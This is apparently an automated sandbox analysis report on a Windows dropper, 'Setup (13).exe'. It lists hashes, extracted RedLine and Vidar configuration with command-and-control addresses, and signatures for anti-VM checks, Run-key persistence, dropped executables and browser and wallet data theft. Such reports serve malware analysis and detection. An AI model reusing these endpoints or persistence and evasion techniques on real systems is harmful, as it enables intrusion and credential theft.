Overview
overview
10Static
static
Setup (1).exe
windows7_x64
10Setup (1).exe
windows10_x64
10Setup (10).exe
windows7_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows7_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows7_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows7_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows7_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows7_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows7_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows7_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows7_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows7_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows7_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows7_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows7_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows7_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows7_x64
10Setup (23).exe
windows10_x64
10Resubmissions
11-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 1029-08-2021 11:37
210829-18htk4slyj 1028-08-2021 23:10
210828-rt8b9gzxn6 1028-08-2021 22:59
210828-zxgnh5j4w6 1028-08-2021 11:31
210828-xrjs66aknj 10Analysis
-
max time kernel
1496s -
max time network
1797s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24-08-2021 08:18
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Setup (1).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
Setup (10).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
Setup (10).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
Setup (11).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
Setup (11).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
Setup (12).exe
Resource
win7v20210408
Behavioral task
behavioral8
Sample
Setup (12).exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
Setup (13).exe
Resource
win7v20210408
Behavioral task
behavioral10
Sample
Setup (13).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
Setup (14).exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
Setup (15).exe
Resource
win7v20210410
Behavioral task
behavioral14
Sample
Setup (15).exe
Resource
win10v20210408
Behavioral task
behavioral15
Sample
Setup (16).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
Setup (17).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
Setup (17).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
Setup (18).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
Setup (18).exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
Setup (19).exe
Resource
win7v20210408
Behavioral task
behavioral22
Sample
Setup (19).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
Setup (2).exe
Resource
win7v20210408
Behavioral task
behavioral24
Sample
Setup (2).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
Setup (20).exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
Setup (21).exe
Resource
win7v20210410
Behavioral task
behavioral28
Sample
Setup (21).exe
Resource
win10v20210408
Behavioral task
behavioral29
Sample
Setup (22).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
Setup (23).exe
Resource
win7v20210410
General
-
Target
Setup (13).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
24.08
95.181.172.100:55640
Extracted
vidar
40.1
937
https://eduarroma.tumblr.com/
-
profile_id
937
Extracted
redline
dibild2
135.148.139.222:1494
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral10/memory/2240-335-0x0000000005230000-0x0000000005B56000-memory.dmp family_glupteba behavioral10/memory/2240-349-0x0000000000400000-0x00000000030E7000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 14 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exerundll32.exeschtasks.exerundll32.exeschtasks.exerundll32.exeschtasks.exerundll32.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4480 2364 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3352 2364 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5096 2364 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5240 2364 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1536 2364 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6308 2364 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4504 2364 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6008 2364 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6668 2364 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7940 2364 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5060 2364 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 192 2364 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5484 2364 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 2364 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 10 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe family_redline C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe family_redline C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe family_redline behavioral10/memory/4532-257-0x000000000041A616-mapping.dmp family_redline behavioral10/memory/4532-285-0x00000000050B0000-0x00000000056B6000-memory.dmp family_redline behavioral10/memory/4812-287-0x000000000041A76A-mapping.dmp family_redline behavioral10/memory/4812-283-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral10/memory/4812-303-0x0000000005770000-0x0000000005C6E000-memory.dmp family_redline behavioral10/memory/4532-253-0x0000000000400000-0x0000000000420000-memory.dmp family_redline C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs
Processes:
WerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exedescription pid process target process PID 1732 created 2804 1732 WerFault.exe 4b5m9Xjbeh4Y9rTVY8V4famT.exe PID 6040 created 1392 6040 WerFault.exe ySzhlkxv6lvVdaZGAMZc3MjG.exe PID 7452 created 7016 7452 Esplorarne.exe.com uQ1sY0V9BPG6y1BJhAoaX8hC.exe PID 2100 created 7096 2100 WerFault.exe Vlaiw1QOxP2xyB7onsxPGq4k.exe PID 8056 created 5072 8056 WerFault.exe MicrosoftEdgeCP.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 8028 created 2240 8028 svchost.exe 9NeY7wDiJGhrvsW_GspXT3lp.exe PID 8028 created 6844 8028 svchost.exe Esplorarne.exe.com -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral10/memory/2100-294-0x00000000040A0000-0x000000000413D000-memory.dmp family_vidar behavioral10/memory/2100-307-0x0000000000400000-0x0000000002402000-memory.dmp family_vidar -
Blocklisted process makes network request 64 IoCs
Processes:
rundll32.exerundll32.exeMsiExec.exeRUNDLL32.EXEflow pid process 208 4968 rundll32.exe 248 4968 rundll32.exe 428 7120 rundll32.exe 435 920 MsiExec.exe 464 920 MsiExec.exe 477 4496 RUNDLL32.EXE 477 4496 RUNDLL32.EXE 479 4496 RUNDLL32.EXE 483 4496 RUNDLL32.EXE 485 4496 RUNDLL32.EXE 487 4496 RUNDLL32.EXE 488 4496 RUNDLL32.EXE 490 4496 RUNDLL32.EXE 494 4496 RUNDLL32.EXE 435 920 MsiExec.exe 496 4496 RUNDLL32.EXE 498 4496 RUNDLL32.EXE 505 4496 RUNDLL32.EXE 507 4496 RUNDLL32.EXE 512 4496 RUNDLL32.EXE 515 4496 RUNDLL32.EXE 528 4496 RUNDLL32.EXE 530 4496 RUNDLL32.EXE 531 4496 RUNDLL32.EXE 532 4496 RUNDLL32.EXE 534 4496 RUNDLL32.EXE 534 4496 RUNDLL32.EXE 534 4496 RUNDLL32.EXE 534 4496 RUNDLL32.EXE 534 4496 RUNDLL32.EXE 535 4496 RUNDLL32.EXE 536 4496 RUNDLL32.EXE 537 4496 RUNDLL32.EXE 538 4496 RUNDLL32.EXE 540 4496 RUNDLL32.EXE 528 4496 RUNDLL32.EXE 540 4496 RUNDLL32.EXE 541 4496 RUNDLL32.EXE 542 4496 RUNDLL32.EXE 464 920 MsiExec.exe 551 4496 RUNDLL32.EXE 552 4496 RUNDLL32.EXE 553 4496 RUNDLL32.EXE 557 4496 RUNDLL32.EXE 558 4496 RUNDLL32.EXE 559 4496 RUNDLL32.EXE 560 4496 RUNDLL32.EXE 561 4496 RUNDLL32.EXE 563 4496 RUNDLL32.EXE 564 4496 RUNDLL32.EXE 565 4496 RUNDLL32.EXE 566 4496 RUNDLL32.EXE 567 4496 RUNDLL32.EXE 568 4496 RUNDLL32.EXE 569 4496 RUNDLL32.EXE 570 4496 RUNDLL32.EXE 571 4496 RUNDLL32.EXE 572 4496 RUNDLL32.EXE 574 4496 RUNDLL32.EXE 576 4496 RUNDLL32.EXE 577 4496 RUNDLL32.EXE 578 4496 RUNDLL32.EXE 579 4496 RUNDLL32.EXE 581 4496 RUNDLL32.EXE -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
Processes:
ultradumnibour.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ultradumnibour.exe File opened for modification C:\Windows\System32\drivers\SET8EEA.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET8EEA.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
Processes:
lscm9tUiznW_ZuLtt7SqvXzl.exe4b5m9Xjbeh4Y9rTVY8V4famT.exe9NeY7wDiJGhrvsW_GspXT3lp.exeMh9JAL13r0v0BmNX5FgEGHKj.exeBOa2qC4wspxHZVE1pYCFRlSJ.exeGZCE7lNx2wr8c3GHhY6VpQGL.exesr1e6evbYvPSPR1h8l_TGwVu.exeiHIn3Sm9ab4PCPMlOJLksIeI.exeC5r_nTDxijl_qNhbR__JA8UL.exeGcpFYsjX4UKHyKnErFNxlep5.exeYtTnmDnMr8kYIzzObFT55Rkd.exej_16kKcB4jVgGPLP0gdjWZI_.exeHvRdJvYAphkP2BshkAtGWhQa.exexSrL1QRuFcmsVaGKJ6KvkP1I.exemgBOJpLraGK2Wlg_GsNS8POH.exeXq_nEPqQVaJIj4O11jOJH7Fl.exexRxZGAoA5TFUm46yqDqWyLKe.exeVQF2oO7acvvovPhrwKWLMcyD.exetuuN5KFkdh6HTJMT2aKyIIjj.exezGFs3qgZ52GcHMqEBczEQ9x9.exeCW9iZUPnTLWFDj2aH5MN_4dK.exesbqPAgkI_05eWSEnnOqyIFuT.exeySzhlkxv6lvVdaZGAMZc3MjG.execustomer3.exemd8_8eus.exejooyu.exesr1e6evbYvPSPR1h8l_TGwVu.exej_16kKcB4jVgGPLP0gdjWZI_.exej_16kKcB4jVgGPLP0gdjWZI_.exetuuN5KFkdh6HTJMT2aKyIIjj.exessqq.exe3bddbg9jWr7Ig8wwsIl8rRbl.exeWO~L~OYJWS8EVL1.eXe3bddbg9jWr7Ig8wwsIl8rRbl.tmplscm9tUiznW_ZuLtt7SqvXzl.exejfiag3g_gg.exexRxZGAoA5TFUm46yqDqWyLKe.exe11111.exe11111.exe11111.exeEsplorarne.exe.comjfiag3g_gg.exeSetup.exe22222.exe22222.exeStats.exerundll32.exeEsplorarne.exe.comCleaner Installation.exeConhost.exeEsplorarne.exe.comStats.tmpEsplorarne.exe.comInlog.tmpPBrowFile15.exeLivelyScreenRecS1.9.exezhaoy-game.exeWEATHER Manager.tmpxtect12.exeRuntimeBroker.exew32tm.exeMicrosoftEdgeCP.exepowershell.exe22222.exepid process 1412 lscm9tUiznW_ZuLtt7SqvXzl.exe 2804 4b5m9Xjbeh4Y9rTVY8V4famT.exe 2240 9NeY7wDiJGhrvsW_GspXT3lp.exe 2172 Mh9JAL13r0v0BmNX5FgEGHKj.exe 4092 BOa2qC4wspxHZVE1pYCFRlSJ.exe 3784 GZCE7lNx2wr8c3GHhY6VpQGL.exe 3220 sr1e6evbYvPSPR1h8l_TGwVu.exe 2508 iHIn3Sm9ab4PCPMlOJLksIeI.exe 2100 C5r_nTDxijl_qNhbR__JA8UL.exe 2660 GcpFYsjX4UKHyKnErFNxlep5.exe 1944 YtTnmDnMr8kYIzzObFT55Rkd.exe 1912 j_16kKcB4jVgGPLP0gdjWZI_.exe 2584 HvRdJvYAphkP2BshkAtGWhQa.exe 3736 xSrL1QRuFcmsVaGKJ6KvkP1I.exe 4072 mgBOJpLraGK2Wlg_GsNS8POH.exe 484 Xq_nEPqQVaJIj4O11jOJH7Fl.exe 3768 xRxZGAoA5TFUm46yqDqWyLKe.exe 2696 VQF2oO7acvvovPhrwKWLMcyD.exe 2684 tuuN5KFkdh6HTJMT2aKyIIjj.exe 2628 zGFs3qgZ52GcHMqEBczEQ9x9.exe 2772 CW9iZUPnTLWFDj2aH5MN_4dK.exe 1184 sbqPAgkI_05eWSEnnOqyIFuT.exe 1392 ySzhlkxv6lvVdaZGAMZc3MjG.exe 4304 customer3.exe 4328 md8_8eus.exe 4376 jooyu.exe 4532 sr1e6evbYvPSPR1h8l_TGwVu.exe 4612 j_16kKcB4jVgGPLP0gdjWZI_.exe 4812 j_16kKcB4jVgGPLP0gdjWZI_.exe 5084 tuuN5KFkdh6HTJMT2aKyIIjj.exe 4860 ssqq.exe 4920 3bddbg9jWr7Ig8wwsIl8rRbl.exe 2980 WO~L~OYJWS8EVL1.eXe 2596 3bddbg9jWr7Ig8wwsIl8rRbl.tmp 1044 lscm9tUiznW_ZuLtt7SqvXzl.exe 3552 jfiag3g_gg.exe 5320 xRxZGAoA5TFUm46yqDqWyLKe.exe 5768 11111.exe 5816 11111.exe 580 11111.exe 4140 Esplorarne.exe.com 2116 jfiag3g_gg.exe 5668 Setup.exe 3844 22222.exe 6096 22222.exe 6132 Stats.exe 4968 rundll32.exe 5924 Esplorarne.exe.com 5100 Cleaner Installation.exe 1904 Conhost.exe 4976 Esplorarne.exe.com 1660 Stats.tmp 6128 Esplorarne.exe.com 4136 Inlog.tmp 1892 PBrowFile15.exe 1656 LivelyScreenRecS1.9.exe 916 zhaoy-game.exe 4356 WEATHER Manager.tmp 5080 xtect12.exe 4680 RuntimeBroker.exe 4620 w32tm.exe 3636 MicrosoftEdgeCP.exe 5824 powershell.exe 6028 22222.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
VQF2oO7acvvovPhrwKWLMcyD.exeCW9iZUPnTLWFDj2aH5MN_4dK.exeGcpFYsjX4UKHyKnErFNxlep5.exeFBFC.exeMh9JAL13r0v0BmNX5FgEGHKj.exeZZ6GYPrzOB779rzI1ngINoXX.exezY9vzMCWwAKcME9k5UgICs9t.exeDy1p0_A7yf7E__PB5TFDm6I9.exe5whapuEleHrHkM3YY_zHWiK8.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VQF2oO7acvvovPhrwKWLMcyD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CW9iZUPnTLWFDj2aH5MN_4dK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GcpFYsjX4UKHyKnErFNxlep5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GcpFYsjX4UKHyKnErFNxlep5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FBFC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FBFC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mh9JAL13r0v0BmNX5FgEGHKj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VQF2oO7acvvovPhrwKWLMcyD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CW9iZUPnTLWFDj2aH5MN_4dK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZZ6GYPrzOB779rzI1ngINoXX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion zY9vzMCWwAKcME9k5UgICs9t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mh9JAL13r0v0BmNX5FgEGHKj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZZ6GYPrzOB779rzI1ngINoXX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Dy1p0_A7yf7E__PB5TFDm6I9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion zY9vzMCWwAKcME9k5UgICs9t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5whapuEleHrHkM3YY_zHWiK8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Dy1p0_A7yf7E__PB5TFDm6I9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5whapuEleHrHkM3YY_zHWiK8.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Esplorarne.exe.comSetup (13).exextect12.exeSHilapajigae.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Esplorarne.exe.com Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup (13).exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation xtect12.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation SHilapajigae.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Esplorarne.exe.com Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Esplorarne.exe.com Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Esplorarne.exe.com Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Esplorarne.exe.com Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Esplorarne.exe.com -
Drops startup file 3 IoCs
Processes:
customer3.exeEsplorarne.exe.comdescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iZpAWbaURv.url Esplorarne.exe.com -
Loads dropped DLL 64 IoCs
Processes:
HvRdJvYAphkP2BshkAtGWhQa.exexRxZGAoA5TFUm46yqDqWyLKe.exe3bddbg9jWr7Ig8wwsIl8rRbl.tmpxRxZGAoA5TFUm46yqDqWyLKe.exetimeout.exerundll32.exeWerFault.exeCleaner Installation.exeStats.tmpInlog.tmpWEATHER Manager.tmpw32tm.exeMicrosoftEdgeCP.exerundll32.exeSetup.exezihUYffJhyVU5DT9YIToGAck.tmp7SfXkOF4pYVqtSw1gYPu9TM6.exe2xJhqbV7AGMYVIT5Wlj8eABz.exerundll32.exeEsplorarne.exe.comMsiExec.exeSetup.tmpMsiExec.exeEsplorarne.exe.comEsplorarne.exe.comrundll32.exeMsiExec.exeRUNDLL32.EXEMsiExec.exeRUNDLL32.EXErundll32.exepid process 2584 HvRdJvYAphkP2BshkAtGWhQa.exe 3768 xRxZGAoA5TFUm46yqDqWyLKe.exe 2596 3bddbg9jWr7Ig8wwsIl8rRbl.tmp 2596 3bddbg9jWr7Ig8wwsIl8rRbl.tmp 5320 xRxZGAoA5TFUm46yqDqWyLKe.exe 5724 timeout.exe 4412 rundll32.exe 2100 WerFault.exe 2100 WerFault.exe 5100 Cleaner Installation.exe 1660 Stats.tmp 1660 Stats.tmp 4136 Inlog.tmp 4136 Inlog.tmp 4356 WEATHER Manager.tmp 4356 WEATHER Manager.tmp 4620 w32tm.exe 4620 w32tm.exe 3636 MicrosoftEdgeCP.exe 4968 rundll32.exe 4968 rundll32.exe 6280 Setup.exe 6804 zihUYffJhyVU5DT9YIToGAck.tmp 6804 zihUYffJhyVU5DT9YIToGAck.tmp 5892 7SfXkOF4pYVqtSw1gYPu9TM6.exe 6428 2xJhqbV7AGMYVIT5Wlj8eABz.exe 7120 rundll32.exe 8116 Esplorarne.exe.com 7144 MsiExec.exe 7176 Setup.tmp 7176 Setup.tmp 7144 MsiExec.exe 4224 MsiExec.exe 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 4224 MsiExec.exe 4224 MsiExec.exe 4412 rundll32.exe 8124 Esplorarne.exe.com 8124 Esplorarne.exe.com 6576 Esplorarne.exe.com 6576 Esplorarne.exe.com 1184 rundll32.exe 920 MsiExec.exe 4496 RUNDLL32.EXE 8124 Esplorarne.exe.com 8288 MsiExec.exe 8288 MsiExec.exe 8712 RUNDLL32.EXE 8712 RUNDLL32.EXE 9052 rundll32.exe 9052 rundll32.exe 920 MsiExec.exe 920 MsiExec.exe 920 MsiExec.exe 920 MsiExec.exe 920 MsiExec.exe 920 MsiExec.exe 920 MsiExec.exe 920 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe themida C:\Users\Admin\Documents\GcpFYsjX4UKHyKnErFNxlep5.exe themida C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe themida C:\Users\Admin\Documents\VQF2oO7acvvovPhrwKWLMcyD.exe themida C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe themida behavioral10/memory/2660-245-0x00000000011E0000-0x00000000011E1000-memory.dmp themida behavioral10/memory/2696-241-0x0000000000C00000-0x0000000000C01000-memory.dmp themida behavioral10/memory/2772-240-0x0000000000FC0000-0x0000000000FC1000-memory.dmp themida behavioral10/memory/2172-230-0x0000000000D30000-0x0000000000D31000-memory.dmp themida C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe themida C:\Users\Admin\Documents\VQF2oO7acvvovPhrwKWLMcyD.exe themida C:\Users\Admin\Documents\GcpFYsjX4UKHyKnErFNxlep5.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
Processes:
Esplorarne.exe.comWerFault.exe5398377.exeultradumnibour.exe7F4.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tuuN5KFkdh6HTJMT2aKyIIjj = "\"C:\\Boot\\pt-BR\\tuuN5KFkdh6HTJMT2aKyIIjj.exe\"" Esplorarne.exe.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\fontdrvhost.exe\"" Esplorarne.exe.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4b5m9Xjbeh4Y9rTVY8V4famT = "\"C:\\Windows\\GameBarPresenceWriter\\4b5m9Xjbeh4Y9rTVY8V4famT.exe\"" WerFault.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\negoexts\\dllhost.exe\"" WerFault.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VQF2oO7acvvovPhrwKWLMcyD = "\"C:\\Users\\Admin\\Documents\\ySzhlkxv6lvVdaZGAMZc3MjG\\VQF2oO7acvvovPhrwKWLMcyD.exe\"" Esplorarne.exe.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\odt\\Idle.exe\"" Esplorarne.exe.com Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5398377.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gafyjagufo.exe\"" ultradumnibour.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iHIn3Sm9ab4PCPMlOJLksIeI = "\"C:\\Recovery\\WindowsRE\\iHIn3Sm9ab4PCPMlOJLksIeI.exe\"" WerFault.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\odt\\dllhost.exe\"" WerFault.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\uvximcnr = "\"C:\\Users\\Admin\\iajrobnh.exe\"" 7F4.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\DscTimer\\lsass.exe\"" WerFault.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3bddbg9jWr7Ig8wwsIl8rRbl = "\"C:\\Program Files\\Windows Security\\3bddbg9jWr7Ig8wwsIl8rRbl.exe\"" WerFault.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
CW9iZUPnTLWFDj2aH5MN_4dK.exezY9vzMCWwAKcME9k5UgICs9t.exe5whapuEleHrHkM3YY_zHWiK8.exeVQF2oO7acvvovPhrwKWLMcyD.exeGcpFYsjX4UKHyKnErFNxlep5.exeZZ6GYPrzOB779rzI1ngINoXX.exeDy1p0_A7yf7E__PB5TFDm6I9.exemd8_8eus.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comMh9JAL13r0v0BmNX5FgEGHKj.exeFBFC.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CW9iZUPnTLWFDj2aH5MN_4dK.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA zY9vzMCWwAKcME9k5UgICs9t.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5whapuEleHrHkM3YY_zHWiK8.exe 